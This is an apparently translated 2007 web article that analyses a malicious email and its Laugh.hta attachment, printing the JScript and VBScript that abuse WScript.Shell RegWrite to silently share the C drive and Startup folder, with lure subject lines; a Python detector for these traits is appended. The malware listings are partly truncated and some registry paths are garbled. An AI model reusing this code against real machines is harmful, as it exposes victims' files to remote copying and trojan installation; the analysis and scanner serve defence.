How to Turn Off Hard Disk Sharing: How a Suspicious Email Shares Your Hard Disk


Date: 2007-08-09
function f() // function that rewrites the registry
  {
  var aa,ss;
  aa=document.applets[0];
  aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  aa.createInstance();
  ss=aa.GetObject();
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Flags",302,"REG_DWord");
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Type",0,"REG_DWORD");
  ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Network
\\LanMan\\C$\\Path","C:\\");
  }
  function init()
  {
  setTimeout("f()", 1000); // call f() once after a 1000 ms delay
  }
  init(); // call the function
  〈/script〉
  〈/BODY〉〈/Html〉
  
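  This email abuses the registry-writing capability of a Microsoft ActiveX component. As soon as you read the message, it adds a key named C$ under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan in the registry and sets the C drive to fully shared! A hacker can then use an SMB scanner to log on to your C drive directly and freely copy, delete, and add files on the disk... and can also upload a trojan to gain permanent, complete control of your machine.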
  
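  Now let's look at the attachment, Laugh.hta. I checked "File Types" and found that the ".hta" extension is actually an HTML Application file, which Mshta.exe interprets and executes. It appeared to be a text file just like WSH and VBS scripts, so I exported it as a Txt file. Ha! Everything was visible!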
  
  〈html〉
  〈script language=vbs〉
  On Error Resume Next ' error-tolerance statement, keeps the program from crashing
  set aa=CreateObject("WScript.Shell") ' create the WScript object
  Set fs = CreateObject("Scripting.FileSystemObject") ' create the file system object
  Set dir1 = fs.GetSpecialFolder(0) ' get the Windows path
  Set dir2 = fs.GetSpecialFolder(1) ' get the System path
  dir1=dir1+"\START MENU\PROGRAMS\启动"
  aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Flags",302,"REG_DWORD" ' write the Dword value Flags, which is the share-type flag
  aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Type",0,"REG_DWORD" ' write the Dword value Type
  aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\
LanMan\S$\Path",dir1 ' write the absolute path of the shared resource
  a=10
  Set Os = CreateObject("Scriptlet.TypeLib") ' create a custom enumeration object
  doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How about have dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How about have dinner with me together?”"


  ' a pile of junk text, kept ready to be written into the target file

(Source: http://www.sheup.com)
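As an added example (not code from the original article), the following Python scanner statically checks a message body or attachment for the two traits both listings above share: obtaining WScript.Shell and writing Flags, Type or Path values under the LanMan key. The function names and the sample text are constructed for illustration; the CLSID and key layout are the ones quoted on this page.

```python
import re

# CLSID passed to setCLSID() in the e-mail script quoted on this page.
WSH_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
# RegWrite "key", data  -- JScript (with parentheses) or VBScript (without).
REGWRITE = re.compile(
    r'RegWrite\s*\(?\s*"(?P<key>[^"]+)"\s*,\s*(?P<data>"[^"]*"|[^,)\s]+)', re.I)
# ...\LanMan\<share>\<Flags|Type|Path>: the three values both listings write.
LANMAN = re.compile(
    r'\\LanMan\\(?P<share>[^\\]+)\\(?P<value>Flags|Type|Path)$', re.I)

def normalise(text):
    """Rejoin keys wrapped at a backslash and collapse JS-doubled backslashes."""
    text = re.sub(r'\s*\n\s*(?=\\)|(?<=\\)\s*\n\s*', '', text)
    return re.sub(r'\\+', r'\\', text)

def scan(text):
    """Report WScript.Shell use and every LanMan share the script defines."""
    flat = normalise(text)
    shares = {}
    for m in REGWRITE.finditer(flat):
        hit = LANMAN.search(m.group("key"))
        if hit:
            entry = shares.setdefault(hit.group("share"), {})
            entry[hit.group("value").capitalize()] = m.group("data").strip('"')
    wsh = (WSH_CLSID.lower() in flat.lower() or
           re.search(r'CreateObject\s*\(\s*"WScript\.Shell"', flat, re.I) is not None)
    return {"wsh": wsh, "shares": shares}

def is_suspicious(text):
    """True when content obtains WScript.Shell and writes a share definition."""
    result = scan(text)
    return result["wsh"] and bool(result["shares"])

# Constructed sample, modelled on the wrapped JScript listing above.
SAMPLE_JS = r'''
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network
\\LanMan\\C$\\Flags",302,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network
\\LanMan\\C$\\Path","C:\\");
'''

if __name__ == "__main__":
    print(scan(SAMPLE_JS), is_suspicious(SAMPLE_JS))
```

The same `scan()` call handles the VBScript form used in the .hta attachment, where `RegWrite` has no parentheses and the path argument is a variable rather than a literal.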

